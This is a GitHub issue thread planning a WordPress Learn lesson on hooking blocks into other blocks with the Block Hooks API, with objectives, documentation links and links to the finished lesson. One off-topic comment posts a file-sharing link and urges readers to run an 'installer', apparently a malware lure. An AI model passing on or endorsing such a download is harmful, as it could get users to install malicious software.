### ISSUE TITLE
Block Hooks API

### ISSUE THREAD

**Issue by jonathanbossenger** [WordPress/Learn#2874]
# Details
 
 - Content type (Online Workshop, Lesson, Course, Tutorial, or Lesson Plan): Lesson
 - Content title: Block Hooks
 - Topic description: Hooking blocks into other blocks using the Block Hooks API
 - Audience (User, Developer, Designer, Contributor, etc.): Developer
 - Experience Level (Beginner, Intermediate, Advanced, Any): Intermediate
 
 # Prerequisites
 
 
 It is assumed that the learner has already completed the following lessons:
 
 # Learning Objectives
 
 - Describe how Block Hooks differs from Block Editor Hooks
 - Explain how to hook a block into another block using the blockHooks metadata property on a block
 # Related Resources and Other Notes
 - https://developer.wordpress.org/block-editor/reference-guides/block-api/block-metadata/#block-hooks
 - https://developer.wordpress.org/block-editor/reference-guides/block-api/block-registration/#block-hooks-optional
 ### Automation Code
 
 //lesson

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by jonathanbossenger** [comment]
Script: https://github.com/wptrainingteam/learn-wp-content/blob/main/plugin-developer-learning-pathway/03-Advanced-Blocks/06-Block-Hooks-API.md

**Comment by jonathanbossenger** [comment]
Video: 

https://github.com/user-attachments/assets/565370af-6b51-4ead-a307-f6b3575116bc

**Comment by jonathanbossenger** [comment]
WordPress.tv: https://wordpress.tv/2024/10/11/block-hooks-api/

**Comment by jonathanbossenger** [comment]
WordPress.tv: https://wordpress.tv/2024/10/11/block-hooks-api/

**Comment by jonathanbossenger** [comment]
YouTube: https://youtu.be/S6xvcn6c8J0

**Comment by jonathanbossenger** [comment]
https://learn.wordpress.org/lesson/block-hooks-api/
